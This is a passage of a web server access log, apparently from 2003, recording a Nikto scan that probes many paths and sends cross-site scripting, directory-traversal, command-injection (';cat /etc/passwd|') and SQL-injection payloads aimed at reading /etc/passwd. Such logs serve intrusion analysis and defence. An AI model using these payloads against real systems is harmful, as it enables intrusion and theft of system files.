HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:31 +0900] "GET /pr0n/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:32 +0900] "GET /private/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:32 +0900] "GET /profile.php?u=xxxxxxxx HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:33 +0900] "GET /profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:34 +0900] "GET /Program%20Files/ HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:34 +0900] "GET /project/index.php?m=projects&user_cookie=1 HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:35 +0900] "GET /pron/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:36 +0900] "GET /pub/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:37 +0900] "GET /pub/english.cgi?op=rmail HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:37 +0900] "GET /public/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:38 +0900] "GET /purchase/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:39 +0900] "GET /purchases/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:39 +0900] "GET /pvote/ch_info.php HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:40 +0900] "GET /pw/ HTTP/1.0" 404 275 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:41 +0900] "GET /pw/storemgr.pw HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:42 +0900] "GET /pwd.db HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:42 +0900] "GET /quikstore.cfg HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:43 +0900] "GET /quikstore.cgi HTTP/1.0" 403 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:44 +0900] "GET /readme HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:44 +0900] "GET /readme.txt HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:45 +0900] "GET /README.TXT HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:46 +0900] "GET /register/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:47 +0900] "GET /registered/ HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:47 +0900] "GET /replymsg.php?send=1&destin=<script>alert('Vulnerable')</script> HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:48 +0900] "GET /reports/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:49 +0900] "GET /reseller/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:49 +0900] "GET /restricted/ HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:50 +0900] "GET /retail/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:51 +0900] "GET /reviews/newpro.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:52 +0900] "GET /ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:52 +0900] "GET /root/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:53 +0900] "GET /rtm.log HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:54 +0900] "GET /sales/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:55 +0900] "GET /samples/search.dll?query=<script>alert(document.cookie)</script> HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:55 +0900] "GET /scozbook/view.php?PG=whatever HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:56 +0900] "GET /script>alert('Vulnerable')</script>.cfm HTTP/1.0" 404 320 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:57 +0900] "GET /scripts HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:57 +0900] "GET /scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini HTTP/1.0" 404 314 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:58 +0900] "GET /scripts/weblog HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:41:59 +0900] "GET /scripts/wsisa.dll/WService=anything?WSMadmin HTTP/1.0" 404 307 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:00 +0900] "<script>alert(Vulnerable)</script> /search.asp?Search= HTTP/1.0" 501 430 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:00 +0900] "GET /search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:01 +0900] "GET /search.php?searchfor=\\\"><script>alert('Vulnerable');</script> HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:02 +0900] "GET /search.php?sess=your_session_id&lookfor=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:02 +0900] "GET /search.vts HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:03 +0900] "GET /search/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:04 +0900] "GET /search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script> HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:05 +0900] "GET /search/index.cfm?<script>alert(\\\"Vulnerable\\\")</script> HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:05 +0900] "GET /search97.vts HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:09 +0900] "GET /search97cgi/s97_cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:10 +0900] "GET /search97cgi/s97_cgi?action=FilterSearch&filter=<script>alert('Vulnerable');</script>; HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:10 +0900] "GET /secret/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:11 +0900] "GET /secure/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:12 +0900] "GET /securecontrolpanel/ HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:13 +0900] "GET /secured/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:13 +0900] "GET /securelogin/1,2345,A,00.html HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:14 +0900] "GET /sell/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:15 +0900] "GET /server_stats/ HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:15 +0900] "GET /servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service= HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:16 +0900] "GET /servlet/allaire.jrun.ssi.SSIFilter HTTP/1.0" 404 306 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:17 +0900] "GET /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter HTTP/1.0" 404 323 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:21 +0900] "GET /servlet/com.unify.servletexec.UploadServlet HTTP/1.0" 404 315 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:21 +0900] "GET /servlet/ContentServer?pagename=<script>alert('Vulnerable')</script> HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:22 +0900] "GET /servlet/Counter HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:23 +0900] "GET /servlet/DateServlet HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:23 +0900] "GET /servlet/FingerServlet HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:24 +0900] "GET /servlet/HelloWorldServlet HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:25 +0900] "GET /servlet/IsItWorking HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:26 +0900] "GET /servlet/SchedulerTransfer HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:26 +0900] "GET /servlet/SessionManager HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:27 +0900] "GET /servlet/SessionServlet HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:28 +0900] "GET /servlet/SimpleServlet HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:28 +0900] "GET /servlet/SnoopServlet HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:29 +0900] "GET /servlet/sunexamples.BBoardServlet HTTP/1.0" 404 305 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:30 +0900] "GET /servlets/SchedulerTransfer HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:31 +0900] "GET /session/admnlogin HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:31 +0900] "GET /SetSecurity.shm HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:32 +0900] "GET /settings/site.ini HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:33 +0900] "GET /setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:33 +0900] "GET /setup/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:34 +0900] "GET /sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script> HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:35 +0900] "GET /shop/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:36 +0900] "GET /shop/database/metacart.mdb HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:36 +0900] "GET /shop/member_html.cgi?file=;cat%20/etc/passwd| HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:37 +0900] "GET /shop/member_html.cgi?file=|cat%20/etc/passwd| HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:38 +0900] "GET /shop/normal_html.cgi?file=&lt;script&gt;alert(\\\"Vulnerable\\\")&lt;/script&gt; HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:38 +0900] "GET /shop/normal_html.cgi?file=../../../../../../etc/issue%00 HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:39 +0900] "GET /shop/normal_html.cgi?file=;cat%20/etc/passwd| HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:40 +0900] "GET /shop/normal_html.cgi?file=|cat%20/etc/passwd| HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:41 +0900] "GET /shopadmin.asp HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:41 +0900] "GET /shopa_sessionlist.asp HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:42 +0900] "GET /shopdbtest.asp HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:43 +0900] "GET /shoponline/fpdb/shop.mdb HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:43 +0900] "GET /shopper/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:44 +0900] "GET /shopping/database/metacart.mdb HTTP/1.0" 404 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:45 +0900] "GET /shopping300.mdb HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:46 +0900] "GET /shopping400.mdb HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:46 +0900] "GET /shoppingdirectory/midicart.mdb HTTP/1.0" 404 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:47 +0900] "GET /showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt; HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:48 +0900] "GET /SilverStream HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:49 +0900] "GET /SilverStream/Meta/Tables/?access-mode=text HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:49 +0900] "GET /simplebbs/users/users.php HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:50 +0900] "GET /sips/sipssys/users/a/admin/user HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:51 +0900] "GET /site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:42:51 +0900] "GET /site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username=USER --/.html HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:42:52 +0900] "GET /siteminder HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:53 +0900] "GET /siteminder/smadmin.html HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:54 +0900] "GET /SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator HTTP/1.0" 404 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:54 +0900] "GET /SiteScope/htdocs/SiteScope.html HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:55 +0900] "GET /smssend.php HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:56 +0900] "GET /software/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:56 +0900] "GET /soinfo.php?\\\"><script>alert('Vulnerable')</script> HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:57 +0900] "GET /source/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:58 +0900] "GET /Sources/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:59 +0900] "GET /SPHERA/login/sm_login_screen.php?error=\\\"><script>alert('Vulnerable')</script> HTTP/1.0" 404 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:42:59 +0900] "GET /SPHERA/login/sm_login_screen.php?uid=\\\"><script>alert('Vulnerable')</script> HTTP/1.0" 404 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:00 +0900] "GET /splashAdmin.php HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:01 +0900] "GET /spwd HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:01 +0900] "GET /sql/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:02 +0900] "GET /sqldump.sql HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:03 +0900] "GET /sqlnet.log HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:04 +0900] "GET /src/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:04 +0900] "GET /src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0 HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:05 +0900] "GET /srchadm HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:06 +0900] "GET /ss.cfg HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:06 +0900] "GET /ss000007.pl?PRODREF=<script>alert('Vulnerable')</script> HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:07 +0900] "GET /ssdefs/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:08 +0900] "GET /ssdefs/siteseed.dtd HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:09 +0900] "GET /sshome/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:09 +0900] "GET /ssi/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:10 +0900] "GET /staff/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:11 +0900] "GET /start.php?config=alper.inc.php HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:11 +0900] "GET /stat.htm HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:12 +0900] "GET /stat/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:13 +0900] "GET /statistic/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:14 +0900] "GET /statistics/ HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:14 +0900] "GET /Statistics/ HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:15 +0900] "GET /stats.htm HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:16 +0900] "GET /stats.html HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:16 +0900] "GET /stats.txt HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:17 +0900] "GET /Stats/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:18 +0900] "GET /stats/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:19 +0900] "GET /status/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:19 +0900] "GET /store/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:20 +0900] "GET /StoreDB/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:21 +0900] "GET /structure.sql HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:21 +0900] "GET /style/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:22 +0900] "GET /styles/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:23 +0900] "GET /stylesheet/ HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:24 +0900] "GET /stylesheets/ HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:24 +0900] "GET /submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:25 +0900] "GET /sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script> HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:26 +0900] "GET /super_stats/access_logs HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:26 +0900] "GET /support/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:27 +0900] "GET /support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:28 +0900] "GET /support/messages HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:29 +0900] "GET /supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:29 +0900] "GET /supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:30 +0900] "GET /supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:31 +0900] "GET /sys/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:31 +0900] "GET /syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script> HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:32 +0900] "GET /syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script> HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:33 +0900] "GET /syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script> HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:43:34 +0900] "GET /syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script> HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - 